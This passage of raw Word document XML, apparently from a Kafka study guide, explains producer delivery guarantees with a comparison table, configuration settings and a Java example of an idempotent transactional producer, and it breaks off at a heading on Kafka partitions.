    <w:p w14:paraId="6A63CA7D"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retries=Integer.MAX_VALUE    # Infinite retries (or as per configuration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BFDC5"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enable.idempotence=true     # Enables idempotence for the producer to prevent duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112338AC"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transactional.id=&lt;id&gt;       # Enables transaction support for the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41EA9D" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED2517D" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>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No message loss or duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka ensures that each message is processed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D1B0E" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>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Higher latency</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Due to idempotent guarantees and transactional support, the processing time is higher compared to other delivery guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61539843" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1328"/>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Costly</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The overhead of guaranteeing exactly-once semantics comes at the cost of higher system complexity and increased resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F053AAC" w14:textId="77777777" w:rsidR="0000666C"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692681D">
          <v:rect id="_x0000_i3148" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8CDBF" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Comparison of the Three Guarante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1"/>
        <w:gridCol w:w="1299"/>
        <w:gridCol w:w="1172"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="3475"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0745EB17" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E9FC7D" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Guarantee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F883B06" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Message Loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="384D3982" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A41263" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0262117F" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="09C568E6" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20587C72"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At Most Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAAD687"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Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF4E1AF"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5682B058"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB3FB87"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Logs, stats, or non-critical data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="10413FB2" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="755606F5"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At Least Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0055E92E"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Not possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ADF4D11"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Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="639C90B1"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Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0867C6C6"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Order processing, analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="6C4ABB22" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3235581F"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Exactly Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4382698A"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Not possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D17A986"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Not possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FCF6415"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223F2A69"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Financial transactions, critical systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09FA0203" w14:textId="77777777" w:rsidR="0000666C"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9B0EE03">
          <v:rect id="_x0000_i3149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="572BEDE7" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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How to Implement Each Guarantee?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B529554" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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1. At Most Once:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A378C43" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>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Producer Config</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000CAA87" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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acks=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F6BBC3" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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retries=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DDC98" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">In this case, the producer will send a message without waiting for an acknowledgment, and it won't retry in case of failure. This will result in the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fastest</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> message delivery but can cause </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message loss</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21546F8E" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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2. At Least Once:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48698B" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>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Producer Config</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805C612" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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acks=1       # or acks=all for stronger guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C92CD" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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retries=3    # Retries up to 3 times on failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8C2C0" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1330"/>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In this case, the producer retries on failure and guarantees that no messages are lost, but some messages may be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicated</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B841865" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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3. Exactly Once:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A88998" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>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Producer Config</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3812F" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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acks=all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FB04E" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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retries=Integer.MAX_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB7E12" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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enable.idempotence=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB05B4C" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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transactional.id=my-transactional-id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB3586" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1331"/>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This configuration enables </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which guarantees that each message is delivered </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The producer retries on failure and ensures no message duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59311106" w14:textId="77777777" w:rsidR="0000666C"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3A7BBE2">
          <v:rect id="_x0000_i3150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66E7A0" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Example Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0B3CC"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Here’s how you would configure the producer for </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exactly Once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E8EAC"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Properties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D043619"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props.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C4037"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props.put("acks", "all");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56583D5E"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props.put("retries", Integer.MAX_VALUE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1237329E"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props.put("enable.idempotence", "true");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D875A"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props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E6B20"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props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194085E4"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props.put("transactional.id", "my-transactional-id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5D3872" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224B453B"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KafkaProducer&lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABBDC7" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239C50DD"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producer.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6F265"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producer.send(new ProducerRecord&lt;&gt;(topic, key, value));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571DEACD"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producer.commitTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C599B5" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A6896D" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Kafka’s delivery guarantees allow producers to choose the level of reliability they need based on the requirements of the application. For applications that can tolerate some message loss (e.g., logging), </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>At Most Once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is sufficient. For critical applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exactly Once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> guarantees both reliability and no duplicates, although it comes with higher overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEE68A" w14:textId="3F03D956" w:rsidR="0000666C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0000666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D52DD63">
          <v:rect id="_x0000_i3151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43885025" w14:textId="6704956B" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00025820" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="779" w:name="_Toc196308259"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka partitions, and why are they used</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
